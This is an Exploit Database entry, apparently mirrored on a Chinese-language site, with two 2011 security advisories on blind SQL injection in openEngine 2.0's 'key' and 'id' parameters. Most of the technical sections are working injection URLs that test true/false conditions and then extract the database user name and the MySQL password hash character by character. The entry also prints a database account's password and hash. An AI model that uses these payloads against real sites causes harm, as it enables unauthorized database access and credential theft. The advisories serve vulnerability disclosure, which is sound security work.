openEngine 2.0 – Multiple Blind SQL Injection Vulnerabilities

• Exploit Database
• 119 阅读

• 作者： Stefan Schurtz
  日期： 2011-10-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17951/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158

  Advisory: openEngine 2.0 &apos;key&apos; Blind SQL Injection vulnerability Advisory ID: SSCHADV2011-026 Author: Stefan Schurtz Affected Software: Successfully tested on openEngine 2.0 100226 Vendor URL: http://www.openengine.de/ Vendor Status: informed CVE-ID: -   ========================== Vulnerability Description: ==========================   The &apos;key&apos; parameter in openEngine 2.0 is prone to a Blind SQL Injection   ================== Technical Details: ==================   # Database information User: easy   # Blind SQL Injection   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2 -> "Sie m?chten die Seite versenden." http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1 -> "Sie m?chten die Seite Homepage (de) versenden."   # User-Guessing   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121   ========= Solution: =========   -   ==================== Disclosure Timeline: ====================   08-Oct-2011 - informed developers 08-Oct-2011 - release date of this security advisory   ======== Credits: ========   Vulnerability found and advisory written by Stefan Schurtz.   =========== References: ===========   http://www.openengine.de/ http://www.rul3z.de/advisories/SSCHADV2011-026.txt   Advisory: openEngine 2.0 &apos;id&apos; Blind SQL Injection vulnerability Advisory ID: SSCHADV2011-019 Author: Stefan Schurtz Affected Software: Successfully tested on openEngine 2.0 100226 Vendor URL: http://www.openengine.de/ Vendor Status: informed CVE-ID: -   ========================== Vulnerability Description: ==========================   openEngine 2.0 is prone to a Blind SQL Injection   ================== Technical Details: ==================   Database information   User: easy Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)   Blind SQL Injection   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND 1=1 AND (&apos;a&apos;=&apos;a&key= <- error http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND 1=0 AND (&apos;a&apos;=&apos;a&key= <- no error   User-Guessing   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND (&apos;a&apos;=&apos;a <- error (e)   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND (&apos;a&apos;=&apos;a <- error (a)   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND (&apos;a&apos;=&apos;a <- error (s)   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND (&apos;a&apos;=&apos;a <- error (y)   Password(Hash)-Guessing   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1)) = 42 AND (&apos;a&apos;=&apos;a <- error (*)   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),2,1)) = 69 AND (&apos;a&apos;=&apos;a <- error (E)   http://<target>/openengine/cms/website.php?id=/de/sendpage.htm&apos;) AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),3,1)) = 56 AND (&apos;a&apos;=&apos;a <- error (8) ... and so on   ========= Solution: =========   -   ==================== Disclosure Timeline: ====================   25-Sep-2011 - informed developers 26-Sep-2011 - release date of this security advisory 27-Sep-2011 - post on BugTraq   ======== Credits: ========   Vulnerability found and advisory written by Stefan Schurtz.   =========== References: ===========   http://www.openengine.de/ https://www.securityfocus.com/bid/49794/info http://www.rul3z.de/advisories/SSCHADV2011-019.txt